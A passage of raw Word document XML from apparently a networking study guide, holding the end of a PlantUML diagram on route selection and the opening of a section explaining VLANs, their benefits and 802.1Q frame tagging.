          <w:p w14:paraId="21D30B4C" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="386528F8" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightSkyBlue :Only one route has the longest prefix length (/32 host route);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE17B14" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="343B5E98" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  Why NO here?  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A8CD20" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  - Only one /32 match exists.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD231A5" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  - No tie → router picks it immediately.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC76BCC" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="797F3750" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2079FFD6" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03586D51" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>if (Uses gateway?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72667538" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightSkyBlue :Forward packet to next hop (192.168.1.254);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FABD968" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EC0528E" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightGray :Send directly to destination host;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="132C0162" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A3DC061" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E0A106B" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>stop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7324C823" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="651EDCCD" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>legend right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C098880" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightSkyBlue = taken path  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44C68325" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightGray    = not taken  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EA20AF8" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;color:green&gt;Green block&lt;/color&gt; = sample routing table</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="798B8E7A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>Endlegend</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E5DBF9" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0234D0D4" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F3C01C0" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0CA9" w14:paraId="706CF487" w14:textId="77777777" w:rsidTr="00DF4B7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="557D1AA5" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00C75443" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B741C42" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="231293E2" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial Black" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B2FBE9" w14:textId="2A20EDD4" w:rsidR="00C75443" w:rsidRDefault="002A358C" w:rsidP="00C75443">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002A358C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Virtual Local Area Network </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00C75443">
        <w:t>VLAN</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED7D20" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:t>Introduction to VLANs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6168F" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FC2EEF" w14:textId="03ED483D" w:rsidR="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virtual Local Area Networks (VLANs)</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>logical groupings of devices within a physical network that create separate broadcast domains</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>, allowing network administrators to partition a single physical network into multiple isolated logical networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620069FF" w14:textId="2DE3BC62" w:rsidR="001C253C" w:rsidRDefault="001C253C" w:rsidP="00382FFA">
      <w:r w:rsidRPr="001C253C">
        <w:t>OSI Layer: Data Link (Layer 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01947F81" w14:textId="51566D7C" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>enefits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC189C" w14:textId="292F3C03" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>egmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Logical separation of network traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5478DA9C" w14:textId="5FE348D3" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nhancement</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Isolated broadcast domains reduce attack surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6771FB" w14:textId="62B587CE" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performance </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ptimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Smaller broadcast domains improve network efficiency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8C85D3" w14:textId="37620050" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Administrative </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Easy device reassignment without physical changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4043BC1D" w14:textId="754D973B" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cost </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Multiple logical networks on single physical infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA16F80" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:t>How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183F51D3" w14:textId="021BE1F6" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:r w:rsidRPr="00382FFA">
        <w:t xml:space="preserve">VLANs operate by tagging Ethernet frames with VLAN </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>dentifiers (VIDs) that range from 1 to 4094:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032DAB3" w14:textId="1905E95D" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">egmentation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rocess:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FCF711" w14:textId="43BB6BB3" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Frame </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>agging</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Switch adds 4-byte 802.1Q tag to Ethernet frames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089F328D" w14:textId="3C14E308" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ssignment</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Ports assigned to specific VLANs (access mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6309DC" w14:textId="01D3C586" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Broadcast </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">omain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reation</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Each VLAN forms separate broadcast domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E376F" w14:textId="177BD889" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Traffic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>solation</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Devices in different VLANs cannot communicate directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D215020" w14:textId="6BF8658C" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Inter-VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>outing</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Layer 3 device required for cross-VLAN communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5355BF54" w14:textId="0D6E446F" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">orld </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nalogy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B99CCC3" w14:textId="77777777" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:r w:rsidRPr="00382FFA">
        <w:t>VLANs are like apartment buildings with separate floors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7651271C" w14:textId="29C8DFDE" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Physical </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uilding</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:t>: Single switch hardware (building structure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225647F2" w14:textId="4D5B84DA" w:rsidR="00382FFA" w:rsidRPr="00382FFA" w:rsidRDefault="00382FFA" w:rsidP="00382FFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Separate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00382FFA">
        <w:rPr>
